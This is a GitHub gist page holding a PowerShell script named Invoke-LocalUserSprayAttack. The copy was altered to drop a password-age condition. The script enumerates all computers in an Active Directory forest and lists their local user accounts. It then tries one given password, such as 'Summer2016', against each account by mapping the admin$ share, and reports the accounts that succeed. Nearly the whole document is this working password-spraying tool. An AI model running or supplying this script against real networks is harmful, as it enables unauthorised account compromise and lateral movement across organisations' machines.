Created
April 16, 2022 11:22
-
-
Save pich4ya/ea7fabccb4af1beb8a4415880c3d68e7 to your computer and use it in GitHub Desktop.
https://raw.githubusercontent.com/MrAnde7son/PowerShell/master/Invoke-LocalUserSprayAttack.ps1 without password age condition
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Itamar Mizrahi (@MrAnde7son) | |
| License: GNU v3 | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| #> | |
| function Invoke-LocalUserSprayAttack | |
| { | |
| <# | |
| .SYNOPSIS | |
| // Update 2022-04-16: Remove password age condition | |
| Search all local user accounts within the forest whose password age is above 31 days, and validate against a given password. | |
| Author: Itamar Mizrahi (@MrAnde7son) | |
| License: GNU v3 | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| .DESCRIPTION | |
| .PARAMETER Password | |
| Password to use. | |
| .EXAMPLE | |
| PS C:\> Invoke-LocalUserSprayAttack -Password Summer2016 | |
| Returns users that were validated successfully | |
| #> | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory=$true)] | |
| [String] | |
| $Password = '*' | |
| ) | |
| $net = New-Object -ComObject WScript.Network | |
| $Users = @() | |
| $AllComputers= @() | |
| $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() | |
| $DomainList = @($Forest.Domains) | |
| $Domains = $DomainList | foreach { $_.name } | |
| foreach ($Domain in $Domains) | |
| { | |
| $strFilter = "(objectCategory=Computer)" | |
| $objDomain = New-Object System.DirectoryServices.DirectoryEntry($Domain) | |
| $objSearcher = New-Object System.DirectoryServices.DirectorySearcher | |
| $objSearcher.SearchRoot = $objDomain | |
| $objSearcher.PageSize = 200 | |
| $objSearcher.Filter = $strFilter | |
| $objSearcher.SearchScope = "Subtree" | |
| $objSearcher.PropertiesToLoad.Add("Name") | Out-Null | |
| $colResults = $objSearcher.FindAll() | |
| foreach ($objResult in $colResults) | |
| { | |
| $AllComputers += $objResult.Properties.Item("Name") | |
| } | |
| } | |
| foreach ($computer in $AllComputers){ | |
| $UserObjects = ([adsi]"WinNT://$computer,Computer").Children | ? {$_.SchemaClassName -eq "User" } | select Path | |
| foreach ($user in $UserObjects){ | |
| $object = New-Object psobject | |
| $object | Add-Member -MemberType NoteProperty -Name "Path" -Value $user.Path | |
| $Users += $object | |
| } | |
| } | |
| foreach ($user in $Users){ | |
| $comp = $user.Path.Split("/")[3] | |
| $login = $user.Path.Split("/")[3] + "\" + $user.Path.Split("/")[4] | |
| try { | |
| $result = $net.MapNetworkDrive("u:", "\\$comp\admin$", $false, $login, $Password) | |
| } | |
| catch {} | |
| if($result -eq 0){ | |
| $net.RemoveNetworkDrive("u:",$true,$true) | |
| $user | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment